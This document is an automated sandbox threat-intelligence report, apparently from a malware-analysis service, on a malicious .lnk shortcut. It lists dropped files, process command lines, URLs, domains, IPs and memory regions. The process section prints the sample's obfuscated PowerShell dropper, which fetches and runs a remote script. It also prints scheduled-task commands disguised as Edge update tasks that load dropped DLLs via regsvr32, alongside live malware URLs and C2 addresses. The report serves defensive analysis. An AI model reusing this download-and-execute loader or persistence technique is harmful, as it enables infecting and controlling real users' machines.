IOC Report
rpQF1aDIK4.lnk

loading gif

Files

File Path
Type
Category
Malicious
rpQF1aDIK4.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=19, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\Users\Public\ajbs50ul.bat
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\miEk.ini
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\u0ow.ini
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\Desktop\utox_x86_x64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0d1e1ns5.xlc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uojmcjy.mki.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lup0svj.sl1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3hct0mt.ldv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfnxvhbx.p4k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1slj341.abj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdfycxle.dwb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmm3eqyj.jca.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlvkgjf4.1hw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvw4j1q2.1op.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\second_data_temp.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Tox\tox_save.tox
data
dropped
C:\Users\user\AppData\Roaming\Tox\utox_save.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Tox\utox_save.in~
Generic INItialization configuration [interface]
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
malicious
C:\Users\Public\ajbs50ul.bat
"C:\Users\Public\ajbs50ul.bat"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
malicious
C:\Windows\System32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini
malicious
C:\Users\user\Desktop\utox_x86_x64.exe
"C:\Users\user\Desktop\utox_x86_x64.exe"
malicious
C:\Windows\System32\OpenWith.exe
"C:\Windows\system32\openwith.exe"
malicious
C:\Windows\System32\regsvr32.exe
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini
malicious
C:\Program Files\Windows Media Player\wmpshare.exe
"C:\Program Files\Windows Media Player\wmpshare.exe"
malicious
C:\Windows\System32\dllhost.exe
"C:\Windows\system32\dllhost.exe"
malicious
C:\Windows\System32\rekeywiz.exe
"C:\Windows\system32\rekeywiz.exe"
malicious
C:\Windows\System32\rekeywiz.exe
"C:\Windows\system32\rekeywiz.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
malicious
C:\Windows\System32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
malicious
C:\Windows\System32\regsvr32.exe
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://go.micro
unknown
malicious
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://duckduckgo.com/ac/?q=
unknown
https://1h982d.bemostake.space
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://1h982d.bp24mostakp24.spacp24/tp24st.txt
unknown
https://www.ecosia.org/newtab/
unknown
https://rocketdocs.lol/utox_x86.exe
188.114.96.3
https://github.com/Pester/Pester
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://rocketdocs.lol
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
188.114.96.3
http://rocketdocs.lol
unknown
https://aka.ms/pscore68
unknown
http://www.microsoft.c
unknown
http://bemostake.space
unknown
https://bemostake.space
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://1h982d.bemostake.space/test.txt
188.114.96.3
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://1h982d.bemostake.space
unknown
There are 25 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bemostake.space
188.114.96.3
1h982d.bemostake.space
188.114.96.3
rocketdocs.lol
188.114.96.3
s-part-0017.t-0009.t-msedge.net
13.107.246.45

IPs

IP
Domain
Country
Malicious
192.168.2.9
unknown
unknown
malicious
46.29.238.96
unknown
Russian Federation
malicious
147.45.126.71
unknown
Russian Federation
malicious
104.223.122.15
unknown
United States
malicious
185.196.9.174
unknown
Switzerland
malicious
195.93.190.6
unknown
Ukraine
192.168.2.8
unknown
unknown
104.233.104.126
unknown
Saudi Arabia
148.251.23.146
unknown
Germany
192.168.2.7
unknown
unknown
163.172.136.118
unknown
United Kingdom
95.215.44.78
unknown
Latvia
193.124.186.205
unknown
Russian Federation
192.168.2.5
unknown
unknown
8.8.8.8
unknown
United States
37.97.185.116
unknown
Netherlands
130.133.110.14
unknown
Germany
194.249.212.109
unknown
Slovenia
136.243.141.187
unknown
Germany
37.187.122.30
unknown
France
185.14.30.213
unknown
Ukraine
185.58.206.164
unknown
Russian Federation
51.254.84.212
unknown
France
80.87.193.193
unknown
Russian Federation
46.229.52.198
unknown
Ukraine
205.185.116.116
unknown
United States
85.21.144.224
unknown
Russian Federation
188.114.96.3
bemostake.space
European Union
192.168.2.255
unknown
unknown
198.98.51.198
unknown
United States
There are 20 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\SibCode
sn2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
Version
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
22BF85FB000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F6000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
1B570000
direct allocation
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F9000
heap
page read and write
malicious
22BF85FC000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
1B790000
direct allocation
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F9000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF57D0000
direct allocation
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FA000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FC000
heap
page read and write
malicious
22BF85FC000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85F1000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F5000
heap
page read and write
malicious
22BF85FA000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85F6000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
1BC61000
direct allocation
page execute and read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F8000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F4000
heap
page read and write
malicious
22BF85F8000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF8501000
heap
page read and write
malicious
22BF85FB000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85F9000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
22BF85FD000
heap
page read and write
malicious
1BF81000
direct allocation
page execute and read and write
malicious
22BF8534000
heap
page read and write
1AB70000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
7FF887AFC000
trusted library allocation
page execute and read and write
22BF85B4000
heap
page read and write
1AADAE7C000
unkown
page read and write
7FF887C40000
trusted library allocation
page execute and read and write
7FF887BD1000
trusted library allocation
page read and write
1B4A0000
trusted library allocation
page read and write
206E000
stack
page read and write
1AA73000
trusted library allocation
page read and write
2746C421000
trusted library allocation
page read and write
2730000
trusted library allocation
page read and write
22BF79F9000
heap
page read and write
22BF85E4000
heap
page read and write
22BF7C77000
heap
page read and write
7FF887ACC000
trusted library allocation
page execute and read and write
1B0103BA000
trusted library allocation
page read and write
22BF85F5000
heap
page read and write
1B000D4C000
trusted library allocation
page read and write
7DF43188A000
unkown
page read and write
22BF7C75000
heap
page read and write
2921000
heap
page read and write
1AB40000
trusted library allocation
page read and write
23D20DF0000
unkown
page read and write
2BC0000
trusted library allocation
page read and write
2944000
heap
page read and write
2696000
trusted library allocation
page read and write
22BF7A2F000
heap
page read and write
1C640000
unkown
page read and write
597C000
heap
page read and write
7FF887DD8000
trusted library allocation
page read and write
24A2E341000
heap
page read and write
22BF85E4000
heap
page read and write
22BF85F5000
heap
page read and write
22BF7C48000
heap
page read and write
7FF887AF6000
trusted library allocation
page execute and read and write
1AC00000
trusted library allocation
page read and write
7FF887B40000
trusted library allocation
page execute and read and write
1B000572000
trusted library allocation
page read and write
23D22A25000
heap
page read and write
1CB5B3CC000
trusted library allocation
page read and write
2745A84A000
heap
page read and write
1AB70000
trusted library allocation
page read and write
2A5A9390000
heap
page read and write
7DF431886000
unkown
page read and write
22BF7A9A000
heap
page read and write
1ACA4000
heap
page read and write
22BF8534000
heap
page read and write
22BF7C75000
heap
page read and write
1E8E000
stack
page read and write
22BF7A10000
heap
page read and write
1FF9000
heap
page read and write
22BF7A00000
heap
page read and write
7EB000
stack
page read and write
1B570000
trusted library allocation
page read and write
1AA70000
remote allocation
page read and write
22BF7C48000
heap
page read and write
22BF7C2D000
heap
page read and write
7FF887A7C000
trusted library allocation
page execute and read and write
23D20FFF000
unkown
page read and write
D2F000
heap
page read and write
22BF7A03000
heap
page read and write
22BF7C68000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1CB636D8000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AA60000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
7FF7178DB000
unkown
page write copy
1BA83000
trusted library allocation
page read and write
22BF7A99000
heap
page read and write
1AF00000
trusted library allocation
page read and write
1ADAE000
heap
page read and write
23D20D5F000
unkown
page execute and read and write
22BF7E10000
heap
page read and write
27E0000
heap
page read and write
AF0000
heap
page read and write
FD0000
heap
page readonly
1AB43000
trusted library allocation
page read and write
A70903B000
stack
page read and write
7DF47D800000
trusted library allocation
page execute and read and write
1C6F8000
unkown
page read and write
22BF8574000
heap
page read and write
1AB70000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
22BF7FD8000
heap
page read and write
7FF887D60000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C0D000
heap
page read and write
1AA73000
trusted library allocation
page read and write
1AB63000
trusted library allocation
page read and write
1ACAB000
heap
page read and write
22BF7C40000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7A99000
heap
page read and write
1B7A0000
heap
page execute and read and write
1B550000
trusted library allocation
page read and write
F25DB7E000
stack
page read and write
22BF7C58000
heap
page read and write
2725000
trusted library allocation
page read and write
7FF887CE0000
trusted library allocation
page read and write
1CB495D0000
trusted library allocation
page read and write
1C6FB000
unkown
page read and write
22BF7C75000
heap
page read and write
2745A7A0000
heap
page read and write
1B550000
trusted library allocation
page read and write
44D2CBF000
stack
page read and write
1BA70000
trusted library allocation
page read and write
10D3000
heap
page read and write
22BF7C4F000
heap
page read and write
22BF7C68000
heap
page read and write
2E10000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
22BF85ED000
heap
page read and write
1B51C000
stack
page read and write
1AB40000
trusted library allocation
page read and write
1B9B8000
heap
page read and write
22BF7C2C000
heap
page read and write
23D210D0000
heap
page read and write
1AA67000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
2A8F000
stack
page read and write
1AB40000
trusted library allocation
page read and write
1035000
heap
page read and write
1B018C13000
heap
page read and write
672D000
stack
page read and write
1AC11000
heap
page read and write
2745C1D0000
trusted library allocation
page read and write
22BF7C08000
heap
page read and write
1BA90000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AE30000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
59FC000
heap
page read and write
7FF887BF0000
trusted library allocation
page execute and read and write
1CB63557000
heap
page execute and read and write
1C8F6000
unkown
page read and write
1AA70000
trusted library allocation
page read and write
7FF887A43000
trusted library allocation
page execute and read and write
1B010633000
trusted library allocation
page read and write
190000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7A3C000
heap
page read and write
22BF7C6A000
heap
page read and write
1E879E10000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C0F000
heap
page read and write
1AB40000
trusted library allocation
page read and write
7FF887AD6000
trusted library allocation
page read and write
1B001E4B000
trusted library allocation
page read and write
22BF7A3F000
heap
page read and write
22BF7A99000
heap
page read and write
22BF7C83000
heap
page read and write
1B8A0000
trusted library allocation
page read and write
22BF7C3D000
heap
page read and write
22BF85F5000
heap
page read and write
1BA90000
trusted library allocation
page read and write
22BF58B1000
heap
page read and write
22BF7C58000
heap
page read and write
7FF887D70000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
CE5000
heap
page read and write
22BF7C77000
heap
page read and write
1B470000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7FD8000
heap
page read and write
7FF887D90000
trusted library allocation
page read and write
1B07E200000
heap
page read and write
7FF887B2C000
trusted library allocation
page execute and read and write
22BF7C28000
heap
page read and write
1B770000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
1AB61000
trusted library allocation
page read and write
1B690000
trusted library section
page read and write
7FF887BA0000
trusted library allocation
page execute and read and write
1AB40000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
22BF7A9A000
heap
page read and write
22BF7C83000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF5897000
heap
page read and write
22BF86FA000
heap
page read and write
1AB70000
trusted library allocation
page read and write
24A2E241000
heap
page read and write
2745A7C0000
heap
page read and write
7FF8DEFFF000
unkown
page read and write
22BF7A99000
heap
page read and write
22BF85CC000
heap
page read and write
A708E37000
stack
page read and write
1BBC0000
trusted library allocation
page read and write
1AA80000
trusted library allocation
page read and write
27474980000
heap
page read and write
1B560000
trusted library allocation
page read and write
2A5A900C000
unkown
page read and write
22BF85F4000
heap
page read and write
1AADAE21000
unkown
page execute read
22BF7C0F000
heap
page read and write
5D9000
heap
page read and write
5978000
heap
page read and write
1B018AA0000
heap
page read and write
7FF887A3D000
trusted library allocation
page execute and read and write
1B990000
trusted library allocation
page read and write
598A000
heap
page read and write
1AA70000
remote allocation
page read and write
1AC51000
heap
page read and write
22BF859C000
heap
page read and write
27474B68000
heap
page read and write
22BF85BC000
heap
page read and write
7FF887C54000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF859C000
heap
page read and write
1ED0000
trusted library allocation
page read and write
1BB50000
trusted library allocation
page read and write
1BB14000
trusted library allocation
page read and write
1B500000
trusted library allocation
page read and write
1AADAFC5000
heap
page read and write
22BF8534000
heap
page read and write
22BF85D4000
heap
page read and write
2745A9B0000
heap
page read and write
BF0000
heap
page read and write
1AB43000
trusted library allocation
page read and write
2A5A9108000
heap
page read and write
22BF85A4000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C37000
heap
page read and write
1AEB0000
trusted library allocation
page read and write
22BF7C73000
heap
page read and write
2963000
heap
page read and write
1AB40000
trusted library allocation
page read and write
2745D17F000
trusted library allocation
page read and write
1B540000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
22BF7C37000
heap
page read and write
22BF7C83000
heap
page read and write
F25D6DC000
stack
page read and write
1B78C000
trusted library allocation
page read and write
22BF7C27000
heap
page read and write
23D22970000
heap
page read and write
22BF7A40000
heap
page read and write
22BF7C0F000
heap
page read and write
22BF7C58000
heap
page read and write
1AB60000
trusted library allocation
page read and write
2CE0000
trusted library section
page read and write
1AB43000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
10E5000
heap
page read and write
1AA60000
trusted library allocation
page read and write
7FF887DE0000
trusted library allocation
page read and write
1BF80000
trusted library allocation
page read and write
2A5A9175000
heap
page read and write
22BF7C75000
heap
page read and write
7FF887A23000
trusted library allocation
page read and write
22BF7AA3000
heap
page read and write
1BBC0000
trusted library allocation
page read and write
2745A990000
heap
page read and write
22BF86FA000
heap
page read and write
22BF859B000
heap
page read and write
7FF887A83000
trusted library allocation
page execute and read and write
22BF79FB000
heap
page read and write
22BF85CC000
heap
page read and write
22BF857C000
heap
page read and write
1BAC0000
trusted library allocation
page read and write
2276000
heap
page read and write
27474AF0000
heap
page read and write
25F0000
heap
page read and write
22BF85B4000
heap
page read and write
27474B1C000
heap
page read and write
1B4BC000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
7FF887BF0000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
1CB636EA000
heap
page read and write
2180000
heap
page execute and read and write
2745A803000
heap
page read and write
22BF7A3C000
heap
page read and write
1EA0000
trusted library allocation
page read and write
1AB20000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
FE0000
heap
page read and write
7FF887A34000
trusted library allocation
page read and write
1AD0A000
heap
page read and write
CB0000
heap
page read and write
2920000
heap
page read and write
22BF86FA000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7D07000
heap
page read and write
22BF79FB000
heap
page read and write
23D22A25000
heap
page read and write
D41000
heap
page read and write
2745C260000
trusted library allocation
page read and write
22BF8534000
heap
page read and write
1B07E1A0000
heap
page read and write
2B30000
heap
page read and write
2745D6A2000
trusted library allocation
page read and write
22BF7A41000
heap
page read and write
22BF85A4000
heap
page read and write
7FF887A62000
trusted library allocation
page read and write
E90000
heap
page read and write
22BF7C70000
heap
page read and write
22BF8534000
heap
page read and write
1BAA0000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
A489538000
stack
page read and write
1B4B0000
trusted library allocation
page read and write
2745CE0B000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
22BF851C000
heap
page read and write
22BF85DF000
heap
page read and write
1B760000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
12F58000
trusted library allocation
page read and write
D30000
heap
page read and write
22BF86FA000
heap
page read and write
1BB20000
trusted library allocation
page read and write
22BF85A5000
heap
page read and write
5D6000
heap
page read and write
1AD0A000
heap
page read and write
A708EB8000
stack
page read and write
27474C7D000
heap
page read and write
22BF7BFD000
heap
page read and write
2F40000
heap
page read and write
1ACD0000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
22BF8529000
heap
page read and write
3712000
stack
page read and write
1B7B0000
trusted library allocation
page read and write
979000
unkown
page readonly
1CB636DE000
heap
page read and write
22BF85A4000
heap
page read and write
22BF7C75000
heap
page read and write
1AA60000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF86FA000
heap
page read and write
1B7E0000
trusted library allocation
page read and write
22BF7A03000
heap
page read and write
22BF7C48000
heap
page read and write
1B55A000
trusted library allocation
page read and write
AF5000
heap
page read and write
22BF7A92000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1B570000
trusted library allocation
page read and write
C90000
heap
page read and write
22BF80A7000
unkown
page read and write
2411000
trusted library allocation
page read and write
1C8E2000
unkown
page read and write
22BF8509000
heap
page read and write
632B000
stack
page read and write
1B010639000
trusted library allocation
page read and write
1ADAE000
heap
page read and write
23D229AE000
heap
page read and write
1B001DBF000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
22BF86FA000
heap
page read and write
22BF85B4000
heap
page read and write
22BF850B000
heap
page read and write
22BF7B9C000
heap
page read and write
10A0000
heap
page read and write
22BF85E4000
heap
page read and write
7FF887A60000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
7FF887AD0000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
1CB4B312000
trusted library allocation
page read and write
22BF85EC000
heap
page read and write
22BF7C68000
heap
page read and write
1AC80000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1BAD0000
trusted library allocation
page read and write
22BF7DC0000
trusted library allocation
page read and write
1ABB0000
trusted library allocation
page read and write
1ABE0000
trusted library allocation
page read and write
1B000090000
trusted library allocation
page read and write
1B8C0000
trusted library allocation
page read and write
22BF7C80000
heap
page read and write
1BBED000
trusted library allocation
page read and write
44D2BB8000
stack
page read and write
2A5A917C000
heap
page read and write
593B000
heap
page read and write
4980000
heap
page read and write
22BF7C48000
heap
page read and write
1B450000
trusted library allocation
page read and write
A48A30A000
stack
page read and write
1B510000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1CB5B0F0000
trusted library allocation
page read and write
22BF8518000
heap
page read and write
1B4B0000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
1B490000
trusted library allocation
page read and write
1B018DE0000
heap
page read and write
2624000
heap
page read and write
1AA90000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
2973000
heap
page read and write
2746C705000
trusted library allocation
page read and write
27474F64000
heap
page read and write
22BF85E4000
heap
page read and write
49C0000
heap
page read and write
22BF7AB8000
heap
page read and write
1CB4C8D2000
trusted library allocation
page read and write
1BA50000
trusted library allocation
page read and write
7FF887CC0000
trusted library allocation
page read and write
1B5D0000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
22BF7A28000
heap
page read and write
22BF7C75000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF7C77000
heap
page read and write
2B29000
heap
page read and write
1AC0A000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
2DCF000
trusted library allocation
page read and write
27474C79000
heap
page read and write
23EA000
trusted library allocation
page read and write
1B580000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
C18000
heap
page read and write
2932000
heap
page read and write
2B54000
heap
page read and write
22BF7A03000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1BAE0000
trusted library allocation
page read and write
22BF7AA8000
heap
page read and write
1B470000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
2A95000
heap
page read and write
7FF887A9C000
trusted library allocation
page execute and read and write
1B820000
trusted library allocation
page read and write
1B018BC5000
heap
page read and write
1B002195000
